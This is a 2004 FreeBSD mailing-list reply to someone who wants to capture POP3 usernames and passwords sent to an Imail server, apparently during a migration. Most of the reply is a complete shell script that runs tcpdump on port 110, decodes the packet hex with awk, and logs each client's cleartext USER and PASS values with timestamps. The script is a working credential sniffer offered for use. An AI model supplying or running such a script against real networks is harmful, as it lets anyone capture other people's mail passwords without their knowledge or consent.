Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST)
From: <freebsd-lists@albury.net.au>
To: John Fox <readbsd@mind.net>
Cc: freebsd-isp@freebsd.org
Subject: Re: tcpdump for sniffing POP3 -- methods ?
Message-ID: <Pine.BSF.4.31.0404140608551.38850-100000@giroc.albury.net.au>
In-Reply-To: <20040413180323.GA13554@mind.net>
On Tue, 13 Apr 2004, John Fox wrote:
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.

I had to do this some years back, here's the rude, crude and unattractive script I wrote then:

# cat sniff.pop.passwords
#! /bin/sh
log=sniffed.passwords.log
mailhost="mail"   # Hostname of whichever host receives your incoming mail
tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
BEGIN { lut="123456789abcdef" }
/>/ { IP=$2; n=0; len=0; c=""; }
{
  if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
  if(++n>3 && len>20) {
    for(i=(n==4)*4+1; i<=NF; i++)
      c=sprintf("%s%c%c", c,
        index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
        index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
    if(length(c) >= len-40) {
      sub("\.[0-9]*$","",IP); v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
      if(substr(c,1,5)=="USER ") usr[IP]=v;
      if(substr(c,1,5)=="PASS " && usr[IP]) {
        printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
        usr[IP]=""
      }
    }
  }
}'